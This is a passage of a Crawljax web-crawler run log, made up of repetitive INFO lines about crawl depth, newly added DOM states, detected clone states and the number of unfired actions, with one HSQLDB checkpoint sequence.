CLONE State detected: state341 and state99 are the same. 2211909 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 27 states with unfired actions 2214152 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2215289 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2216569 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2218062 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state342 and state14 are the same. 2218066 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 27 states with unfired actions 2220305 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2221490 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2222784 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2224287 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state343 and state43 are the same. 2224291 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 27 states with unfired actions 2226530 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2227784 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2229135 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2230616 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state344 and state26 are the same. 2230620 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 27 states with unfired actions 2232874 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2234025 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2235172 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2236371 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state345 added to the StateMachine. 2236371 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2236381 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 27 states with unfired actions 2238799 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2239965 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2241115 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2242315 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state346 added to the StateMachine. 2242315 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2242324 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 27 states with unfired actions 2244625 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2245817 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2246965 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2248173 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state347 added to the StateMachine. 2248173 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2248182 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 27 states with unfired actions 2250441 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2251602 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2252748 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2253984 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state348 added to the StateMachine. 2253984 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2253992 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 27 states with unfired actions 2256255 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2257411 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2258564 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2259742 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state349 added to the StateMachine. 2259742 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2259757 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 27 states with unfired actions 2262116 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2263280 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2264450 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2265651 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state350 added to the StateMachine. 2265651 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2265659 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 27 states with unfired actions 2267901 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2269079 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2270245 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2271445 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state351 and state322 are the same. 2271448 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 27 states with unfired actions 2273677 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2274847 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2276004 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2277202 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state352 added to the StateMachine. 2277202 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2277210 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 27 states with unfired actions 2279466 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2280636 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2281799 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2282975 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state353 added to the StateMachine. 2282975 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2282983 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 26 states with unfired actions 2285203 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2286404 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2287576 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2288775 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state354 added to the StateMachine. 2288776 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2288784 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 25 states with unfired actions 2290997 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2292138 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2293309 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2294523 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state355 added to the StateMachine. 2294523 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2294531 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 25 states with unfired actions 2296735 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2297886 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2299060 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2300261 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state356 added to the StateMachine. 2300262 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2300267 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 26 states with unfired actions 2301376 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 25 states with unfired actions 2303628 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2304865 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2306039 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2307239 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state358 added to the StateMachine. 2307239 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2307247 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 24 states with unfired actions 2309480 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2310743 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2311926 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2313158 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state359 and state14 are the same. 2313161 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 24 states with unfired actions 2315375 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2316515 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2317691 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2318909 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state360 and state14 are the same. 2318913 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 23 states with unfired actions 2321115 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2322290 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2323485 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2324698 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state361 added to the StateMachine. 2324698 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2324706 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 23 states with unfired actions 2326951 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2328097 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2329263 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2330517 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state362 added to the StateMachine. 2330517 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2330527 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 23 states with unfired actions 2332746 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2333889 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2335069 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2336383 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state363 added to the StateMachine. 2336383 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2336391 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 23 states with unfired actions 2338599 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2339744 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2340960 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state364 added to the StateMachine. 2340960 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 2340980 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 22 states with unfired actions 2343234 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2344370 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2345534 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2346747 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state365 added to the StateMachine. 2346747 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2346757 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 22 states with unfired actions 2349065 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2350248 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2351555 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2353072 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state366 added to the StateMachine. 2353072 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2353082 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 22 states with unfired actions 2355482 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2356642 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2357922 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2359426 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state367 and state130 are the same. 2359430 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 22 states with unfired actions 2361686 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2362864 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2364143 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2365628 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state368 added to the StateMachine. 2365628 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2365638 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 22 states with unfired actions 2367928 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2369092 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2370370 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2371849 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state369 and state14 are the same. 2371853 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 22 states with unfired actions 2374101 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2375266 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2376544 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2378087 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state370 added to the StateMachine. 2378087 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2378099 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 22 states with unfired actions 2380376 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2381518 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2382799 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2384431 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state371 and state14 are the same. 2384435 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 22 states with unfired actions 2386674 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2387822 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2389406 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2390888 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state372 added to the StateMachine. 2390888 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2390898 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 22 states with unfired actions 2393165 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2394310 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2395453 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2396645 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state373 added to the StateMachine. 2396645 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2396655 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 22 states with unfired actions 2398932 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2400102 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2401245 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2402448 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state374 added to the StateMachine. 2402448 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2402457 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 22 states with unfired actions 2404777 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2405946 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2407093 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2408286 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state375 added to the StateMachine. 2408286 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2408294 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 22 states with unfired actions 2410531 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2411683 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2412830 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2414041 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state376 added to the StateMachine. 2414042 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2414050 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 22 states with unfired actions 2414223 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 2414224 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 2414234 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 2414511 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 2414514 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 2416308 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2417463 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2418641 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2419813 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state377 added to the StateMachine. 2419813 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2419821 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 21 states with unfired actions 2422041 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2423219 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2424409 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2425605 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state378 added to the StateMachine. 2425605 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2425613 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 21 states with unfired actions 2427844 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2429011 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2430170 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2431358 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state379 and state352 are the same. 2431361 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 21 states with unfired actions 2433585 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2434906 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2436111 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2437351 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state380 added to the StateMachine. 2437351 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2437359 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 21 states with unfired actions 2439569 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2440721 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2441890 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2443101 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state381 added to the StateMachine. 2443101 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2443110 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 21 states with unfired actions 2445318 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2446473 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2447649 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2448864 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state382 added to the StateMachine. 2448864 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2448869 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 22 states with unfired actions 2449984 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 21 states with unfired actions 2452216 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2453356 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2454532 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2455802 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state384 and state14 are the same. 2455805 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 21 states with unfired actions 2458020 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2459161 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2460338 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2461529 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state385 added to the StateMachine. 2461529 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2461537 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 20 states with unfired actions 2463767 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2464913 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2466161 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2467410 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state386 added to the StateMachine. 2467410 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2467426 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 20 states with unfired actions 2469662 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2470807 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2471988 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2473313 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state387 and state91 are the same. 2473318 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 19 states with unfired actions 2475551 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2476692 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2477854 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2479085 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state388 added to the StateMachine. 2479085 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2479094 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 19 states with unfired actions 2481327 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2482469 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2483760 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2485399 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state389 added to the StateMachine. 2485399 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2485409 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 19 states with unfired actions 2487663 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2488811 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2490142 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2491661 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state390 added to the StateMachine. 2491661 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2491672 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 19 states with unfired actions 2493938 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2495088 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2496367 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2497905 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state391 and state14 are the same. 2497909 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 19 states with unfired actions 2500134 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2501282 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2502553 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2504344 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state392 and state99 are the same. 2504350 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 19 states with unfired actions 2506583 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2507733 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2509046 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2510571 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state393 and state14 are the same. 2510575 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 19 states with unfired actions 2512805 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2513944 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2515229 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2516790 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state394 and state43 are the same. 2516794 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 19 states with unfired actions 2519027 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2520175 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2521459 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2523102 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state395 and state26 are the same. 2523106 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 19 states with unfired actions 2525417 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2526563 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2527766 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2528990 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state396 added to the StateMachine. 2528990 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2528999 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 18 states with unfired actions 2531254 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2532412 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2533566 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2535480 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state397 added to the StateMachine. 2535480 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2535490 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 18 states with unfired actions 2537732 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2538877 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2540063 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2541445 